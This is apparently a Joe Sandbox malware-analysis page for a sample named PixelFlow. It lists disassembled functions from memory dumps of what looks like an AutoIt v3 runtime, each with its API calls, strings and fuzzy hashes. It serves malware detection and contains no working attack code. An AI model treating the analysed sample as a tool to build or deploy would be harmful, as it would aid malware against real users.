Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 4db3f12a1260db0d9444de98c0370a87e162913932ce45bdc735edc224957d1f
Instruction ID: d6d6e9b8e318c668556006cd3f5ec0f7c2f0288193d9e409bff2a03a754373fd
Opcode Fuzzy Hash: 4db3f12a1260db0d9444de98c0370a87e162913932ce45bdc735edc224957d1f
Instruction Fuzzy Hash: 93A1A430A4021ABBCB54EF21DD52EEE77BBAF45740F084028F8056B392EB709E95DB54

Function 0067795A Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0067798D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00677A4C
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00677A8A
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00677A9C
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00677AE2
GetClientRect.USER32(00000000,?), ref: 00677AEE
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00677B32
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00677B41
GetStockObject.GDI32(00000011), ref: 00677B51
SelectObject.GDI32(00000000,00000000), ref: 00677B55
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00677B65
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00677B6E
DeleteDC.GDI32(00000000), ref: 00677B77
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00677BA3
SendMessageW.USER32(00000030,00000000,00000001), ref: 00677BBA
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00677BF5
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00677C09
SendMessageW.USER32(00000404,00000001,00000000), ref: 00677C1A
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00677C4A
GetStockObject.GDI32(00000011), ref: 00677C55
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00677C60
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00677C6A

Strings

AutoIt v3, xrefs: 00677ADA
static, xrefs: 00677B2C, 00677C44
DISPLAY, xrefs: 00677B37
msctls_progress32, xrefs: 00677BEB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 54753cf8af702a59b26028db9f76728f3d2205e96c93d956eaf3f47913006fc3
Instruction ID: 1fdbd0b9cf64126f8456ea14846cc0103e7cde0ff99a5586dcaa1bd6a24d012f
Opcode Fuzzy Hash: 54753cf8af702a59b26028db9f76728f3d2205e96c93d956eaf3f47913006fc3
Instruction Fuzzy Hash: D7A14EB1A40619BFEB14DFA4DC4AFAF7BAAEB44714F008115FA15A72E0D774AD00CB64

Function 0066B1C0 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066B1CE
GetDriveTypeW.KERNEL32(?,00692C4C,?,\\.\,00690980), ref: 0066B2AB
SetErrorMode.KERNEL32(00000000,00692C4C,?,\\.\,00690980), ref: 0066B409

Strings

Virtual, xrefs: 0066B3D1
FileBackedVirtual, xrefs: 0066B3D8
SATA, xrefs: 0066B3BC
iSCSI, xrefs: 0066B3AE
USB, xrefs: 0066B3A0
SAS, xrefs: 0066B3B5
MMC, xrefs: 0066B3CA
SSA, xrefs: 0066B392
SCSI, xrefs: 0066B376
ATA, xrefs: 0066B384
ATAPI, xrefs: 0066B37D
Network, xrefs: 0066B2E9
Removable, xrefs: 0066B2FD
Unknown, xrefs: 0066B2CB, 0066B36F
SSD, xrefs: 0066B336
RAMDisk, xrefs: 0066B2D5
1394, xrefs: 0066B38B
\\.\, xrefs: 0066B220
Fibre, xrefs: 0066B399
CDROM, xrefs: 0066B2DF
RAID, xrefs: 0066B3A7
PhysicalDrive, xrefs: 0066B257
Fixed, xrefs: 0066B2F3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f91f8c2e1b05b5a73a9ea6bbc0cdfc2e02b1219c728b42eb35d2189b3088dab3
Instruction ID: 4d6f8b2a8f39077a2f2f6e96bf7eaad75cb5c82f33bf28ed94f6dd72daeed199
Opcode Fuzzy Hash: f91f8c2e1b05b5a73a9ea6bbc0cdfc2e02b1219c728b42eb35d2189b3088dab3
Instruction Fuzzy Hash: AD51C470780205EBCB14DB14E9A2CFEB3A7EB45340B21505AE606F7791DBB19ED2CB61

Function 0068ACB7 Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0068ACF0
SetTextColor.GDI32(?,?), ref: 0068ACF4
GetSysColorBrush.USER32(0000000F), ref: 0068AD0A
GetSysColor.USER32(0000000F), ref: 0068AD15
CreateSolidBrush.GDI32(?), ref: 0068AD1A
GetSysColor.USER32(00000011), ref: 0068AD32
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068AD40
SelectObject.GDI32(?,00000000), ref: 0068AD51
SetBkColor.GDI32(?,00000000), ref: 0068AD5A
SelectObject.GDI32(?,?), ref: 0068AD67
InflateRect.USER32(?,000000FF,000000FF), ref: 0068AD86
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068AD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0068ADB2
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068ADDA
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0068AE01
InflateRect.USER32(?,000000FD,000000FD), ref: 0068AE1F
DrawFocusRect.USER32(?,?), ref: 0068AE2A
GetSysColor.USER32(00000011), ref: 0068AE38
SetTextColor.GDI32(?,00000000), ref: 0068AE40
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0068AE54
SelectObject.GDI32(?,0068A9E7), ref: 0068AE6B
DeleteObject.GDI32(?), ref: 0068AE76
SelectObject.GDI32(?,?), ref: 0068AE7C
DeleteObject.GDI32(?), ref: 0068AE81
SetTextColor.GDI32(?,?), ref: 0068AE87
SetBkColor.GDI32(?,?), ref: 0068AE91

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: e0def854288f6ddb43a38e452de1f179b655d2645d0ecbe3de70f5c6c6afbb09
Instruction ID: 4966ec404fd6696ddae31b00268f6dafff285fe0127e9228a4b5495fef537c0a
Opcode Fuzzy Hash: e0def854288f6ddb43a38e452de1f179b655d2645d0ecbe3de70f5c6c6afbb09
Instruction Fuzzy Hash: DC515C72901208BFEF119FA4DC48EEEBB7AEF08320F115616F915AB2A1D7719941DF90

Function 00688DC2 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00688EAE
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688EBF
CharNextW.USER32(0000014E), ref: 00688EEE
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00688F2F
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00688F45
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00688F56
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00688F73
SetWindowTextW.USER32(?,0000014E), ref: 00688FC5
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00688FDB
SendMessageW.USER32(?,00001002,00000000,?), ref: 0068900C
_memset.LIBCMT ref: 00689031
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0068907A
_memset.LIBCMT ref: 006890D9
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00689103
SendMessageW.USER32(?,00001074,?,00000001), ref: 0068915B
SendMessageW.USER32(?,0000133D,?,?), ref: 00689208
InvalidateRect.USER32(?,00000000,00000001), ref: 0068922A
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00689274
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006892A1
DrawMenuBar.USER32(?), ref: 006892B0
SetWindowTextW.USER32(?,0000014E), ref: 006892D8

Strings

0, xrefs: 00689242

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 47a82750ba8f83bfb86df918ae0a84f0fc4e7c09ccf3eb0bd6d20a333bd25911
Instruction ID: cce6df82cff4af0266917d508568382d2d7f9333bc04a2f2602121f79ef4673d
Opcode Fuzzy Hash: 47a82750ba8f83bfb86df918ae0a84f0fc4e7c09ccf3eb0bd6d20a333bd25911
Instruction Fuzzy Hash: 9AE18071900219BFDB20AF54DC84EFE7BBAEF05710F14825AF915AB291DB708A81DF64

Function 00684C94 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00684DCF
GetDesktopWindow.USER32 ref: 00684DE4
GetWindowRect.USER32(00000000), ref: 00684DEB
GetWindowLongW.USER32(?,000000F0), ref: 00684E4D
DestroyWindow.USER32(?), ref: 00684E79
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00684EA2
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00684EC0
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00684EE6
SendMessageW.USER32(?,00000421,?,?), ref: 00684EFB
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00684F0E
IsWindowVisible.USER32(?), ref: 00684F2E
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00684F49
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00684F5D
GetWindowRect.USER32(?,?), ref: 00684F75
MonitorFromPoint.USER32(?,?,00000002), ref: 00684F9B
GetMonitorInfoW.USER32(00000000,?), ref: 00684FB5
CopyRect.USER32(?,?), ref: 00684FCC
SendMessageW.USER32(?,00000412,00000000), ref: 00685037

Strings

tooltips_class32, xrefs: 00684E9B
(, xrefs: 00684FA8
0, xrefs: 00684D7A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8541cde35e673c718caf8fc73b1742a1c7f834a2214ca35be8ec1d45b9f17f42
Instruction ID: 00bdc2e89f74c4110e8b0bccc000ef0ef63cf88b8cc1fa372ca695179d00498b
Opcode Fuzzy Hash: 8541cde35e673c718caf8fc73b1742a1c7f834a2214ca35be8ec1d45b9f17f42
Instruction Fuzzy Hash: D3B18C71604741AFDB44EF24C848B6BBBE6BF84314F008A1DF59A9B291DB71EC05CB96

Function 006647F7 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00664809
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0066482F
_wcscpy.LIBCMT ref: 0066485D
_wcscmp.LIBCMT ref: 00664868
_wcscat.LIBCMT ref: 0066487E
_wcsstr.LIBCMT ref: 00664889
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006648A5
_wcscat.LIBCMT ref: 006648EE
_wcscat.LIBCMT ref: 006648F5
_wcsncpy.LIBCMT ref: 00664920

Strings

StringFileInfo\, xrefs: 00664878
DefaultLangCodepage, xrefs: 00664908
04090000, xrefs: 006648DB
%u.%u.%u.%u, xrefs: 00664983
\VarFileInfo\Translation, xrefs: 0066489D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 0acff7d6b64ab93d13e68dec4820ee821643376adf6aa0028ba2b995eb105797
Instruction ID: 8f5403b0321a328269b1a5d501a879b8203e048fe71ca9c56e2c0ddf353ab3f5
Opcode Fuzzy Hash: 0acff7d6b64ab93d13e68dec4820ee821643376adf6aa0028ba2b995eb105797
Instruction Fuzzy Hash: F741F7716406257AEB54AB709C43EFF776EDF41720F00015EF904A7292EF349A019AA9

Function 00602BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00602C8C
GetSystemMetrics.USER32(00000007), ref: 00602C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00602CBF
GetSystemMetrics.USER32(00000008), ref: 00602CC7
GetSystemMetrics.USER32(00000004), ref: 00602CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00602D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00602D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00602D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00602D60
GetClientRect.USER32(00000000,000000FF), ref: 00602D7E
GetStockObject.GDI32(00000011), ref: 00602D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00602DA5

Part of subcall function 00602714: GetCursorPos.USER32(?), ref: 00602727
Part of subcall function 00602714: ScreenToClient.USER32(006C67B0,?), ref: 00602744
Part of subcall function 00602714: GetAsyncKeyState.USER32(00000001), ref: 00602769
Part of subcall function 00602714: GetAsyncKeyState.USER32(00000002), ref: 00602777

SetTimer.USER32(00000000,00000000,00000028,00601473), ref: 00602DCC

Strings

hi, xrefs: 00602BEC, 0063C363
AutoIt v3 GUI, xrefs: 00602D44

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$hi
API String ID: 1458621304-1782077531
Opcode ID: 5c21bd61945e904bbdbec7d8f95c00447d96d31f845aad4fa0cdfc15b4ea3a4a
Instruction ID: 194ad03a7c82e1c341237918a3a789de4b7640e3ca2ffc9bb6d1efb735994851
Opcode Fuzzy Hash: 5c21bd61945e904bbdbec7d8f95c00447d96d31f845aad4fa0cdfc15b4ea3a4a
Instruction Fuzzy Hash: 58B16E7164020A9FEB58DFA8CD59BAE7BA6FF08314F104129FA15A72D0DB70A851CF64

Function 00620354 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 348COMMON

Download Yara Rule

APIs

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

GetForegroundWindow.USER32(00690980,?,?,?,?,?), ref: 0062040E
IsWindow.USER32(?), ref: 006564A0

Strings

REGEXPCLASS, xrefs: 006562EB
ACTIVE, xrefs: 0065626D
TITLE, xrefs: 00656435
CLASS, xrefs: 006562CA
LAST, xrefs: 00656257
REGEXPTITLE, xrefs: 00656299
HANDLE, xrefs: 00656283
INSTANCE, xrefs: 006563DF
ALL, xrefs: 00656407

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: e4159119b2a91e6f75ae8849eb0f75990ba104dd95fb7e820887466d74139fce
Instruction ID: 3bb521708298ac0ef9c55d645c0b254c1299b8d6efc907b21974afbecfed3aad
Opcode Fuzzy Hash: e4159119b2a91e6f75ae8849eb0f75990ba104dd95fb7e820887466d74139fce
Instruction Fuzzy Hash: CED12570104602AFDB44EF20D4519EABBABBF54345F80861DF856876A3DB30E99ECF91

Function 006841E7 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00684274
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00684334

Strings

SELECTCLEAR, xrefs: 006843B3
SELECTINVERT, xrefs: 00684404
VIEWCHANGE, xrefs: 006844F3
SELECTALL, xrefs: 0068439B
GETSELECTEDCOUNT, xrefs: 00684317
GETSELECTED, xrefs: 00684462
SELECT, xrefs: 006843CE
DESELECT, xrefs: 00684422
GETTEXT, xrefs: 006842DD
GETSUBITEMCOUNT, xrefs: 006842BF
ISSELECTED, xrefs: 0068433F
GETITEMCOUNT, xrefs: 006842A6
FINDITEM, xrefs: 006844A7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: bc7528ccb5d94170b5117679d4ace8db01b39fd202c3fac4c9106cd8322a9202
Instruction ID: 1be628aa3bb86b73517c2ba365bd5b0797e788337974bb6b7325e684d1dcf9b7
Opcode Fuzzy Hash: bc7528ccb5d94170b5117679d4ace8db01b39fd202c3fac4c9106cd8322a9202
Instruction Fuzzy Hash: D3A15EB0214612ABDB58FF10C851AAAB7A7FF84314F104A6CB8665B3D2DF70ED06CB55

Function 0065AF1D Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0065AF5E
__swprintf.LIBCMT ref: 0065AFFF
_wcscmp.LIBCMT ref: 0065B012
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0065B067
_wcscmp.LIBCMT ref: 0065B0A3
GetClassNameW.USER32(?,?,00000400), ref: 0065B0DA
GetDlgCtrlID.USER32(?), ref: 0065B12C
GetWindowRect.USER32(?,?), ref: 0065B162
GetParent.USER32(?), ref: 0065B180
ScreenToClient.USER32(00000000), ref: 0065B187
GetClassNameW.USER32(?,?,00000100), ref: 0065B201
_wcscmp.LIBCMT ref: 0065B215
GetWindowTextW.USER32(?,?,00000400), ref: 0065B23B
_wcscmp.LIBCMT ref: 0065B24F

Part of subcall function 0062378E: _iswctype.LIBCMT ref: 00623796

Strings

%s%u, xrefs: 0065AFF9

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: acbe3784dff94a5c36611be8c058de5287238a23c9d6864da9b395d9d6df6374
Instruction ID: 4299f2fcfe19e854fedc9930264d6b63a560614ca60c15e6a2f680d6ccf1b8e9
Opcode Fuzzy Hash: acbe3784dff94a5c36611be8c058de5287238a23c9d6864da9b395d9d6df6374
Instruction Fuzzy Hash: 98A1DF71204716AFD714DF60C884BEEB7EAFF44351F105629FD9982290DB30EA59CBA1

Function 0065B850 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0065B894
_wcscmp.LIBCMT ref: 0065B8A5
GetWindowTextW.USER32(00000001,?,00000400), ref: 0065B8CD
CharUpperBuffW.USER32(?,00000000), ref: 0065B8EA
_wcscmp.LIBCMT ref: 0065B908
_wcsstr.LIBCMT ref: 0065B919
GetClassNameW.USER32(00000018,?,00000400), ref: 0065B951
_wcscmp.LIBCMT ref: 0065B961
GetWindowTextW.USER32(00000002,?,00000400), ref: 0065B988
GetClassNameW.USER32(00000018,?,00000400), ref: 0065B9D1
_wcscmp.LIBCMT ref: 0065B9E1
GetClassNameW.USER32(00000010,?,00000400), ref: 0065BA09
GetWindowRect.USER32(00000004,?), ref: 0065BA72

Strings

@, xrefs: 0065B875
ThumbnailClass, xrefs: 0065B95C, 0065B9DC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 00723d8d4f54147c24f9f4fc854b4e844324200b62a4eee2bc58d71947c797db
Instruction ID: c7fd97949298baa6fad947cdde57e2d739761cddbff6ebd6f96117d47058d44a
